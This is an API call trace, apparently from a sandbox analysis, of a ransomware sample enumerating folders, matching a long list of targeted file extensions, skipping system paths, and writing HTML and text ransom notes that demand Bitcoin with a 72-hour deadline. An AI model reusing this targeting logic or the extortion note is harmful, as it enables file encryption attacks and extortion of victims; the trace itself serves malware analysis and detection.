	[0171.265] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.265] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico") returned="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"
	[0171.265] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico") returned 58
	[0171.265] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.265] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0171.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.266] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.266] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94caf8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 0
	[0171.266] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.268] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.270] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office") returned="C:\\Users\\All Users\\Microsoft\\Office"
	[0171.270] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Office\\*.*"
	[0171.270] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.270] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.270] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
	[0171.270] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\office\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.273] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.274] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.278] CloseHandle (hObject=0x384) returned 1
	[0171.279] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.279] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.279] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0171.281] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.281] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\office\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.281] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.281] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.281] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0171.282] CloseHandle (hObject=0x384) returned 1
	[0171.282] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.282] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.282] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.282] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0171.282] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.283] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.283] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0171.286] CloseHandle (hObject=0x384) returned 1
	[0171.286] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.287] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.287] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0171.288] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.288] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.289] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.289] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.289] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0171.289] CloseHandle (hObject=0x384) returned 1
	[0171.290] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\*.*" (normalized: "c:\\users\\all users\\microsoft\\office\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x7f9f4eda, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0171.290] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\*.*") returned 39
	[0171.290] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.292] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\office\\*.*") returned 0x27
	[0171.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="windows") returned 0x0
	[0171.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="boot") returned 0x0
	[0171.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="system volume information") returned 0x0
	[0171.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="temp") returned 0x0
	[0171.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="program files") returned 0x0
	[0171.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="appdata") returned 0x0
	[0171.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="application data") returned 0x0
	[0171.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="winnt") returned 0x0
	[0171.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="tmp") returned 0x0
	[0171.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="cache") returned 0x0
	[0171.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="webcache") returned 0x0
	[0171.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="inetcache") returned 0x0
	[0171.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="nvidia") returned 0x0
	[0171.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="packages") returned 0x0
	[0171.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="cookies") returned 0x0
	[0171.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.297] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="programdata") returned 0x0
	[0171.297] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.297] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.297] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x7f9f4eda, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.297] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.297] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xbf2c43a8, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1
	[0171.297] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1
	[0171.297] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xc114009a, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1
	[0171.298] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xa8eea4a6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Heartbeat", cAlternateFileName="HEARTB~1")) returned 1
	[0171.298] lstrcmpW (lpString1="Heartbeat", lpString2="..") returned 1
	[0171.298] lstrcmpW (lpString1="Heartbeat", lpString2=".") returned 1
	[0171.298] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office") returned="C:\\Users\\All Users\\Microsoft\\Office"
	[0171.298] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
